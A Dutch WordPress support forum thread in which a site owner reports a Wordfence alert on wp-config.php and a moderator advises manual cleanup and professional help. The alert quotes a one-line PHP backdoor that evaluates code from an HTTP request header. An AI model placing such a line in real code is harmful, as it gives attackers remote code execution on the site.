• Opgelost sabinesb2000

    (@sabinesb2000)


    Hallo allemaal. Ik gebruik Wordfence al een tijdje en kon de geïnfecteerde bestanden altijd laten opschonen door Wordfence zelf. Echter heb ik nu sinds een poosje dat onderstaande melding verschijnt na het uitvoeren van een scan. Is er misschien iemand die weet hoe ik dit op kan lossen? Alvast bedankt!

    • Bestand lijkt kwaadaardig of onveilig: wp-config.phpType: Bestand
    • Probleem gevonden 15 October 2023 19:29 Kritiek
    • Bestandsnaam: /home/u96491p90924/domains/not-just-vintage.com/public_html/wp-config.php
    • Bestandstype: WordPress configuratiebestand
    • Details: Dit bestand lijkt te zijn geïnstalleerd of gewijzigd door een hacker om kwaadwillende activiteiten uit te voeren. Als je dit bestand kent, kun je ervoor kiezen om het te negeren om het uit te sluiten van toekomstige scans. De overeenkomende tekst in dit bestand is: eval($_SERVER[‘HTTP_FC6B112’]);\x0arequire

      Het probleemtype is: Backdoor:PHP/EvalSuperGlobal.B.10191
      Beschrijving: Code executed from user input – almost always indicates a backdoor

      Dit is je belangrijkste configuratiebestand en kan niet worden verwijderd. Het moet handmatig worden geschoond.
5 reacties aan het bekijken - 1 tot 5 (van in totaal 5)
  • Moderator Jeroen Rotty

    (@jeroenrotty)

    Support Moderator

    Hey,

    Je zal manueel je wp-config.php bestand moeten induiken en bewerken en die malafide regel(s) moeten verwijderen uit het bestand. Dit kan via FTP of als je web host een bestandsmanager heeft in zijn controlepaneel kan het mogelijks ook via daar.

    Ik maak wel ook nog de opmerking dat enkel dit bestand opschonen mogelijks niet genoeg is om je site ook echt volledig op te schonen, de hack heeft blijkbaar kunnen wegschrijven naar je wp-config.php bestand, dus mogelijks is er nog meer vervuild en moet er echt grondig gekuist worden in je installatie/database.

    Thread starter sabinesb2000

    (@sabinesb2000)

    Hoi! Bedankt voor je berichtje.

    Ik heb een poosje terug wat gekke pagina’s op mijn website gehad omdat blijkbaar mijn Wordfence de scan niet meer (goed) afmaakte. Dit is inmiddels opgelost en ik heb alle vreemde pagina’s, account’s etc verwijderd & geblokkeerd. Waarschijnlijk is dit als gevolg daarvan.

    Ik heb destijds mijn website zelf gemaakt aan de hand van YouTube en heel af en toe een vraagje aan een kennis. Ik heb dus zelf helaas niet zo heel veel kennis hierover. Kunt u mij misschien vertellen wat deze FTP precies inhoud en of ik dit zelf kan oplossen aan de hand daarvan?

    Moderator Jeroen Rotty

    (@jeroenrotty)

    Support Moderator

    Hey Sabine.

    FTP is een protocol om tussen je computer en de server waar je website draait bestanden uit te wisselen, zo kan je dus ook je wp-config.php bestand gaan bewerken. Zoals ik wel al eerder zei, als je site gehackt is, laat je er beter ieman naar kijken die kennis heeft op vlak van het opschonen van een WordPress website.

    Thread starter sabinesb2000

    (@sabinesb2000)

    Ik ben voor de zekerheid (op advies van u) toch maar opzoek gegaan naar iemand die mij hierbij kon helpen. Gelukkig kan mijn hosting provider mij, voor een redelijk bedrag, hierbij helpen. Bedankt voor de snelle reacties & de tips! 🙂

    Moderator Jeroen Rotty

    (@jeroenrotty)

    Support Moderator

    Succes! Ik markeer het topic als opgelost voor nu.

5 reacties aan het bekijken - 1 tot 5 (van in totaal 5)
  • Het onderwerp ‘Wordfence kritiek probleem in belangrijkste configuratie bestand’ is gesloten voor nieuwe reacties.